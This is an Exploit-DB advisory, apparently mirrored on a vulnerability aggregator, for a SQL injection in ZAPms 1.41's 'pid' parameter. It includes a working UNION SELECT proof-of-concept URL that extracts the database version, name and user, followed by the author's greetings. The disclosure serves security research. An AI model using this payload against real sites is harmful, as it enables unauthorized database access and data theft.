Lucene search

K
exploitdbNoGeEDB-ID:24942
HistoryApr 09, 2013 - 12:00 a.m.

ZAPms 1.41 - SQL Injection

2013-04-0900:00:00
NoGe
www.exploit-db.com
23

AI Score

7.4

Confidence

Low

=============================================================================================================


  [o] ZAPms <= SQL Injection Vulnerability

       Software : ZAPms
       Version  : 1.41
       Vendor   : http://www.zapms.de
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Desc     : ZAPms is free open source web content management system,
                  adapted to the needs of businesses on the Internet.
                  The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/products?pid=[SQLi]


=============================================================================================================


  [o] PoC

       http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product


=============================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================


  [o] April 09 2013 - Papua, Indonesia

AI Score

7.4

Confidence

Low

Related for EDB-ID:24942